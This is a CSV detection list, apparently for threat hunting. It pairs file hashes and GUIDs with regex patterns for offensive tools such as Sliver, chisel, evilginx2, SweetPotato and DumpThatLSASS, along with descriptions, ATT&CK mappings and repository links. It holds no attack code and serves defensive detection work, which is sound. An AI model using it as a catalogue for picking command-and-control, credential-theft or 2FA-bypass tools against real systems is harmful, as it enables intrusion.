"*1bd59761e0390b6dee196b67f5cfd3b0dae73cdb5905815cd4ae9d5ae02293f7*",".{0,1000}1bd59761e0390b6dee196b67f5cfd3b0dae73cdb5905815cd4ae9d5ae02293f7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1be8d887faf0e80185a811e2c3a734117dcd081136d088295356bb5ddc6395be*",".{0,1000}1be8d887faf0e80185a811e2c3a734117dcd081136d088295356bb5ddc6395be.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E*",".{0,1000}1BF9C10F\-6F89\-4520\-9D2E\-AAF17D17BA5E.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*1bff5a9cb5275afd7b7d4bf2d3087f1b3bf94864c4decf73f1c82922ad646d2f*",".{0,1000}1bff5a9cb5275afd7b7d4bf2d3087f1b3bf94864c4decf73f1c82922ad646d2f.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*1c008a8214c1fa6b06500d92a76900314b9f889818d6dae55f274f3a95d874b6*",".{0,1000}1c008a8214c1fa6b06500d92a76900314b9f889818d6dae55f274f3a95d874b6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1c0f922ca54295ab3f496fded2eada45fa166e32b34bdefc838ba3919c679208*",".{0,1000}1c0f922ca54295ab3f496fded2eada45fa166e32b34bdefc838ba3919c679208.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1c267e901a65d142bf532bc0d26926dd9ceaa43e16b48df37c0739ba050a1c50*",".{0,1000}1c267e901a65d142bf532bc0d26926dd9ceaa43e16b48df37c0739ba050a1c50.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1c50adeb-53ac-41b9-9c34-7045cffbae45*",".{0,1000}1c50adeb\-53ac\-41b9\-9c34\-7045cffbae45.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*1C5EDA8C-D27F-44A4-A156-6F863477194D*",".{0,1000}1C5EDA8C\-D27F\-44A4\-A156\-6F863477194D.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*1c6b60ff20f7c26a7436d966fc741ecd05dc2b3326de1ebcd7fcf6142ac24409*",".{0,1000}1c6b60ff20f7c26a7436d966fc741ecd05dc2b3326de1ebcd7fcf6142ac24409.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*1c7e93ed2b3eed1303cc11d09b4fea4b183fb0e7041f9584c81ca4c989d8a46f*",".{0,1000}1c7e93ed2b3eed1303cc11d09b4fea4b183fb0e7041f9584c81ca4c989d8a46f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1c841d5d1d34538febdda50a60f9e4f7a9df773a40dccacbd6aaa75595babfdb*",".{0,1000}1c841d5d1d34538febdda50a60f9e4f7a9df773a40dccacbd6aaa75595babfdb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1c9a4023737f0be81e06da3719ab68310dca400ca15cfb63012949215fb694eb*",".{0,1000}1c9a4023737f0be81e06da3719ab68310dca400ca15cfb63012949215fb694eb.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*1cc45acf429d705ee592af1c9e56ac25f5b5acbc27fe555db5007c8be9cc4c42*",".{0,1000}1cc45acf429d705ee592af1c9e56ac25f5b5acbc27fe555db5007c8be9cc4c42.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*1d015455d5d224c4a3a39c9f43d7c057bd5aebad39b04e831d2fa517d94add09*",".{0,1000}1d015455d5d224c4a3a39c9f43d7c057bd5aebad39b04e831d2fa517d94add09.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1d267caeb15c945b29b8a7c377582036ac1f72e2a977042947f149f099b5ffcb*",".{0,1000}1d267caeb15c945b29b8a7c377582036ac1f72e2a977042947f149f099b5ffcb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e*",".{0,1000}1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*1d3480472e9ab2c37d65f2278d4ca4a2fe32ac65953c828fbedddb371ae44cc7*",".{0,1000}1d3480472e9ab2c37d65f2278d4ca4a2fe32ac65953c828fbedddb371ae44cc7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1d3d87c94b03ba803b6af7fd142dd874aa26a2754aa6874b7c498d26ff6152e2*",".{0,1000}1d3d87c94b03ba803b6af7fd142dd874aa26a2754aa6874b7c498d26ff6152e2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*1d523c11769bcf3b85ae63c7d023e531962f46e04dc485c87d69bff6e31635ef*",".{0,1000}1d523c11769bcf3b85ae63c7d023e531962f46e04dc485c87d69bff6e31635ef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb*",".{0,1000}1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*1da68fc3d86dc4d5d67359180fbeb8ad68ae90e347d1a9c12f77e21959c25efa*",".{0,1000}1da68fc3d86dc4d5d67359180fbeb8ad68ae90e347d1a9c12f77e21959c25efa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64*",".{0,1000}1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*1db4fad9a062ba7ef43ec84f312716f72842c934ce7709d0ff2ede56c156517b*",".{0,1000}1db4fad9a062ba7ef43ec84f312716f72842c934ce7709d0ff2ede56c156517b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1db6bf67e6e3a421c4cd377cdd026a5de25a55809a9a2c56e0aa092ef4c8e02e*",".{0,1000}1db6bf67e6e3a421c4cd377cdd026a5de25a55809a9a2c56e0aa092ef4c8e02e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1dd63a324303ac18c64c435bf6acfff6efa419b20c305dddb9905cde41feeb4c*",".{0,1000}1dd63a324303ac18c64c435bf6acfff6efa419b20c305dddb9905cde41feeb4c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1de0d1e7805edcd36247e2c224aa8c691c774ba8497f88f2e2dea157c30906a9*",".{0,1000}1de0d1e7805edcd36247e2c224aa8c691c774ba8497f88f2e2dea157c30906a9.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*1df00852a369cbb0fd8934ff0caaa785f9a0e64df8b3c723f67ea0af9bd3f264*",".{0,1000}1df00852a369cbb0fd8934ff0caaa785f9a0e64df8b3c723f67ea0af9bd3f264.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*1df8bc4fb468ccc0fd85b553411d9b3eb7a2ba4c4a4469ae41913eef9a9e65f6*",".{0,1000}1df8bc4fb468ccc0fd85b553411d9b3eb7a2ba4c4a4469ae41913eef9a9e65f6.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*1E0986B4-4BF3-4CEA-A885-347B6D232D46*",".{0,1000}1E0986B4\-4BF3\-4CEA\-A885\-347B6D232D46.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*1e4ff3139bfa4a040ce59f0efd10cca01d0c7da4e56c306b42f5e485b1a663e9*",".{0,1000}1e4ff3139bfa4a040ce59f0efd10cca01d0c7da4e56c306b42f5e485b1a663e9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1e5feda37def8d6575efcd1ba2c545dd0355f1810b4a7a6051bdd9d3701fdb95*",".{0,1000}1e5feda37def8d6575efcd1ba2c545dd0355f1810b4a7a6051bdd9d3701fdb95.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1E70D62D-CC36-480F-82BB-E9593A759AF9*",".{0,1000}1E70D62D\-CC36\-480F\-82BB\-E9593A759AF9.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*1e944ac6fd16e486ddf69e61510c37b8df113ace0e346223e8d6394c544b32bf*",".{0,1000}1e944ac6fd16e486ddf69e61510c37b8df113ace0e346223e8d6394c544b32bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1ebee3f2cc0a98db23a6bf0af4e5dd14bd8d21a4de9cbba58d43521b0bbe1294*",".{0,1000}1ebee3f2cc0a98db23a6bf0af4e5dd14bd8d21a4de9cbba58d43521b0bbe1294.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*1ecc20b0a11a89389b677aceccc9a47b518aaf088c5d6cac63302b27ad12b364*",".{0,1000}1ecc20b0a11a89389b677aceccc9a47b518aaf088c5d6cac63302b27ad12b364.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1ecf18a303bf9af2e5fc0f2cda9777bf9a759a88614edc0eb416ac4517fa3746*",".{0,1000}1ecf18a303bf9af2e5fc0f2cda9777bf9a759a88614edc0eb416ac4517fa3746.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1ee8207a97428b801b4587c40011193816bd114849e1ddfccc3a313260c20c0c*",".{0,1000}1ee8207a97428b801b4587c40011193816bd114849e1ddfccc3a313260c20c0c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1eec102c2cf354bbc7ae4c188a88920bed7cabcbf91c8b8cf194c996da73ff6b*",".{0,1000}1eec102c2cf354bbc7ae4c188a88920bed7cabcbf91c8b8cf194c996da73ff6b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1ef141bd8ce85451d8764a862ed5d16d3140735f868843cb2f96a15cd7623df6*",".{0,1000}1ef141bd8ce85451d8764a862ed5d16d3140735f868843cb2f96a15cd7623df6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*",".{0,1000}1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*",".{0,1000}1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*1f17ea5b2d547497145f092cc3b7f0ed8acbb821946a5d3265423b7262f2aa4f*",".{0,1000}1f17ea5b2d547497145f092cc3b7f0ed8acbb821946a5d3265423b7262f2aa4f.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*1f182f07f495949b4d2fbeb4582e7e30ee75ff7da5f1fe4773a9893c90d0f9cb*",".{0,1000}1f182f07f495949b4d2fbeb4582e7e30ee75ff7da5f1fe4773a9893c90d0f9cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*",".{0,1000}1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1f29193837f8b7b8ba8c473a6949bd1520e54a2880303cd8aceabbb030f13aed*",".{0,1000}1f29193837f8b7b8ba8c473a6949bd1520e54a2880303cd8aceabbb030f13aed.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1f38f5c7634978f31ac73800ad48c548b97dce8a7264d15fd5d2d9dea9d8416f*",".{0,1000}1f38f5c7634978f31ac73800ad48c548b97dce8a7264d15fd5d2d9dea9d8416f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 